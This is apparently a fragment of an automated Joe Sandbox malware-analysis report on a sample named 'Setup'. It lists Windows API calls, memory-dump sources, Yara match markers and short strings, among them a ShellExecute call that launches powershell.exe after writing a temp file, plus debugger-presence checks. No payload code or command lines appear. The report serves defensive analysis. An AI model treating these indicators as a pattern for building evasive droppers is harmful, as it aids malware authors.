                                                                                                                                                                                                                                                      • API ID: Uninitialize$ByteCharCreateInitializeInstanceMultiWide
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 4150283-0
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • ShellExecuteA.SHELL32(00000000,031F6F48,?,00000000,00000000,00000000), ref: 0319E3F1
                                                                                                                                                                                                                                                        • Part of subcall function 0319E1A0: CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 0319E1CF
                                                                                                                                                                                                                                                        • Part of subcall function 0319E1A0: SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000,?,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 0319E1F1
                                                                                                                                                                                                                                                        • Part of subcall function 0319E1A0: WriteFile.KERNEL32(00000000,00000000,00000001,?,00000000,?,00000000,00000000,?,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 0319E210
                                                                                                                                                                                                                                                        • Part of subcall function 0319E1A0: CloseHandle.KERNEL32(00000000,?,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 0319E226
                                                                                                                                                                                                                                                        • Part of subcall function 0318B460: Concurrency::cancel_current_task.LIBCPMT ref: 0318B532
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: File$CloseConcurrency::cancel_current_taskCreateExecuteHandlePointerShellWrite
                                                                                                                                                                                                                                                      • String ID: -$powershell.exe$type must be number, but is
                                                                                                                                                                                                                                                      • API String ID: 503567120-4150588111
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2770976220.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2d20000_Setup.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 031A7EED
                                                                                                                                                                                                                                                      • IsDebuggerPresent.KERNEL32 ref: 031A7FB9
                                                                                                                                                                                                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 031A7FD2
                                                                                                                                                                                                                                                      • UnhandledExceptionFilter.KERNEL32(?), ref: 031A7FDC
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 254469556-0
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 031D3639: GetLastError.KERNEL32(00000000,?,031D9FF0), ref: 031D363D
                                                                                                                                                                                                                                                        • Part of subcall function 031D3639: SetLastError.KERNEL32(00000000,00000000,00000000,032051F0,000000FF), ref: 031D36DF
                                                                                                                                                                                                                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 031DBDF4
                                                                                                                                                                                                                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 031DBE3E
                                                                                                                                                                                                                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 031DBF04
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: InfoLocale$ErrorLast
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 661929714-0
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 031CBFA5
                                                                                                                                                                                                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 031CBFAF
                                                                                                                                                                                                                                                      • UnhandledExceptionFilter.KERNEL32(031C37AD,?,?,?,?,?,00000000), ref: 031CBFBC
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3906539128-0
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2770976220.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2d20000_Setup.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Concurrency::cancel_current_task
                                                                                                                                                                                                                                                      • String ID: !$LiH$PiH
                                                                                                                                                                                                                                                      • API String ID: 118556049-1169732448
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID: N$array$object
                                                                                                                                                                                                                                                      • API String ID: 0-364997817
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID: R$array$object
                                                                                                                                                                                                                                                      • API String ID: 0-1502003704
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2770976220.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2d20000_Setup.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID: ?$@PI$D
                                                                                                                                                                                                                                                      • API String ID: 0-865519726
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • PathMatchSpecA.SHLWAPI(00000000,?), ref: 031A264F
                                                                                                                                                                                                                                                      • PathMatchSpecA.SHLWAPI(?,?,?,?,?,?,?,?,?,031F73F8,00000001,?,?,031F73F4,00000003), ref: 031A2ACE
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: MatchPathSpec
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3588000350-0
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID: @$i-8
                                                                                                                                                                                                                                                      • API String ID: 0-541822905
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2770976220.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2d20000_Setup.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID: @$i-8
                                                                                                                                                                                                                                                      • API String ID: 0-541822905
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2770976220.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2d20000_Setup.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Concurrency::cancel_current_task
                                                                                                                                                                                                                                                      • String ID: #
                                                                                                                                                                                                                                                      • API String ID: 118556049-1885708031
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2770976220.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2d20000_Setup.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Concurrency::cancel_current_task
                                                                                                                                                                                                                                                      • String ID: @PI
                                                                                                                                                                                                                                                      • API String ID: 118556049-979431602
                                                                                                                                                                                                                                                      Strings
Memory Dump Source
• Source File: 00000000.00000002.2770976220.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2d20000_Setup.jbxd
Yara matches
Similarity
• API ID:
• String ID: @PI$eH
• API String ID: 0-1653450276
Strings
Memory Dump Source
• Source File: 00000000.00000002.2770976220.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2d20000_Setup.jbxd
Yara matches
Similarity
• API ID:
• String ID: @PI$@PI
• API String ID: 0-1786480897
Strings
Memory Dump Source
• Source File: 00000000.00000002.2770976220.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2d20000_Setup.jbxd
Yara matches
Similarity
• API ID: Concurrency::cancel_current_task
• String ID: D
• API String ID: 118556049-2746444292
Strings
Memory Dump Source
• Source File: 00000000.00000002.2770976220.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2d20000_Setup.jbxd
Yara matches
Similarity
• API ID: Concurrency::cancel_current_task
• String ID: D
• API String ID: 118556049-2746444292
Strings
Memory Dump Source
• Source File: 00000000.00000002.2770976220.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2d20000_Setup.jbxd
Yara matches
Similarity
• API ID:
• String ID: @PI
• API String ID: 0-979431602
APIs
• Concurrency::cancel_current_task.LIBCPMT ref: 031966ED
Memory Dump Source
• Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
Similarity
• API ID: Concurrency::cancel_current_task
• String ID:
• API String ID: 118556049-0
APIs
• Concurrency::cancel_current_task.LIBCPMT ref: 02D47ED1
Memory Dump Source
• Source File: 00000000.00000002.2770976220.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2d20000_Setup.jbxd
Yara matches
Similarity
• API ID: Concurrency::cancel_current_task
• String ID:
• API String ID: 118556049-0
APIs
• Concurrency::cancel_current_task.LIBCPMT ref: 0319576B
Memory Dump Source
• Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
Similarity
• API ID: Concurrency::cancel_current_task
• String ID:
• API String ID: 118556049-0
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 02D46F4F
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2770976220.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 03195B95
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 02D47379
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2770976220.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 03196AD7
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 02D482BB
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2770976220.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 03195F34
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 031962D4
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 02D47718
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2770976220.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
APIs
• Concurrency::cancel_current_task.LIBCPMT ref: 02D47AB8
Memory Dump Source
• Source File: 00000000.00000002.2770976220.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2d20000_Setup.jbxd
Yara matches
Similarity
• API ID: Concurrency::cancel_current_task
• String ID:
• API String ID: 118556049-0
APIs
• GetTempPathA.KERNEL32(00000104,?,03205040), ref: 03178E22
  • Part of subcall function 031A71D0: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,?,?,?,03205040), ref: 031A7297
  • Part of subcall function 0318B460: Concurrency::cancel_current_task.LIBCPMT ref: 0318B532
Memory Dump Source
• Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
Similarity
• API ID: ByteCharConcurrency::cancel_current_taskMultiPathTempWide
• String ID:
• API String ID: 978242500-0
Strings
Memory Dump Source
• Source File: 00000000.00000002.2770976220.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2d20000_Setup.jbxd
Yara matches
Similarity
• API ID:
• String ID: N
• API String ID: 0-1130791706
Strings
Memory Dump Source
• Source File: 00000000.00000002.2770976220.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2d20000_Setup.jbxd
Yara matches
Similarity
• API ID:
• String ID: R
• API String ID: 0-1466425173
APIs
• RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,031D79BB,?,?,00000008,?,?,031E1BFF,00000000), ref: 031D7BED
Memory Dump Source
• Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
Similarity
• API ID: ExceptionRaise
• String ID:
• API String ID: 3997070919-0
Strings
Memory Dump Source
• Source File: 00000000.00000002.2770976220.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2d20000_Setup.jbxd
Yara matches
Similarity
• API ID: Concurrency::cancel_current_task
• String ID: @PI
• API String ID: 118556049-979431602
APIs
• IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 031A7BBA
Memory Dump Source
• Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
Similarity
• API ID: FeaturePresentProcessor
• String ID:
• API String ID: 2325560087-0
APIs
• WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,?,?,?,03205040), ref: 031A7297
Memory Dump Source
• Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
Similarity
• API ID: ByteCharMultiWide
• String ID:
• API String ID: 626452242-0
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID: ,
                                                                                                                                                                                                                                                      • API String ID: 0-3772416878
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2770976220.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2d20000_Setup.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID: ,
                                                                                                                                                                                                                                                      • API String ID: 0-3772416878
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID: 0
                                                                                                                                                                                                                                                      • API String ID: 0-4108050209
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 031D3639: GetLastError.KERNEL32(00000000,?,031D9FF0), ref: 031D363D
                                                                                                                                                                                                                                                        • Part of subcall function 031D3639: SetLastError.KERNEL32(00000000,00000000,00000000,032051F0,000000FF), ref: 031D36DF
                                                                                                                                                                                                                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 031DC054
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: ErrorLast$InfoLocale
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3736152602-0
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2770976220.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2d20000_Setup.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID: 0
                                                                                                                                                                                                                                                      • API String ID: 0-4108050209
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 031D3639: GetLastError.KERNEL32(00000000,?,031D9FF0), ref: 031D363D
                                                                                                                                                                                                                                                        • Part of subcall function 031D3639: SetLastError.KERNEL32(00000000,00000000,00000000,032051F0,000000FF), ref: 031D36DF
                                                                                                                                                                                                                                                      • EnumSystemLocalesW.KERNEL32(031DBDA0,00000001), ref: 031DBCE4
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: ErrorLast$EnumLocalesSystem
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 2417226690-0
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 031D3639: GetLastError.KERNEL32(00000000,?,031D9FF0), ref: 031D363D
                                                                                                                                                                                                                                                        • Part of subcall function 031D3639: SetLastError.KERNEL32(00000000,00000000,00000000,032051F0,000000FF), ref: 031D36DF
                                                                                                                                                                                                                                                      • GetLocaleInfoW.KERNEL32(00000000,20000001,?,00000002,?,00000000,?,?,031DBFBC,00000000,00000000,?), ref: 031DC25B
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: ErrorLast$InfoLocale
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3736152602-0
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 031D3639: GetLastError.KERNEL32(00000000,?,031D9FF0), ref: 031D363D
                                                                                                                                                                                                                                                        • Part of subcall function 031D3639: SetLastError.KERNEL32(00000000,00000000,00000000,032051F0,000000FF), ref: 031D36DF
                                                                                                                                                                                                                                                      • EnumSystemLocalesW.KERNEL32(031DC000,00000001), ref: 031DBD57
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: ErrorLast$EnumLocalesSystem
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 2417226690-0
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetLocaleInfoEx.KERNEL32(?,00000022,00000000,00000002,?,?,031B36E0,00000000,?,00000004,031B02C9,?,00000004,031B1351,00000000,00000000), ref: 031BEE50
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: InfoLocale
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 2299586839-0
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 031CF5B1: RtlEnterCriticalSection.NTDLL(?), ref: 031CF5C0
                                                                                                                                                                                                                                                      • EnumSystemLocalesW.KERNEL32(Function_00062C80,00000001,03203468,0000000C,031D40B5,?), ref: 031D3CC5
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1272433827-0
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 031D3639: GetLastError.KERNEL32(00000000,?,031D9FF0), ref: 031D363D
                                                                                                                                                                                                                                                        • Part of subcall function 031D3639: SetLastError.KERNEL32(00000000,00000000,00000000,032051F0,000000FF), ref: 031D36DF
                                                                                                                                                                                                                                                      • EnumSystemLocalesW.KERNEL32(031DBB80,00000001), ref: 031DBC5E
                                                                                                                                                                                                                                                      Memory Dump Source
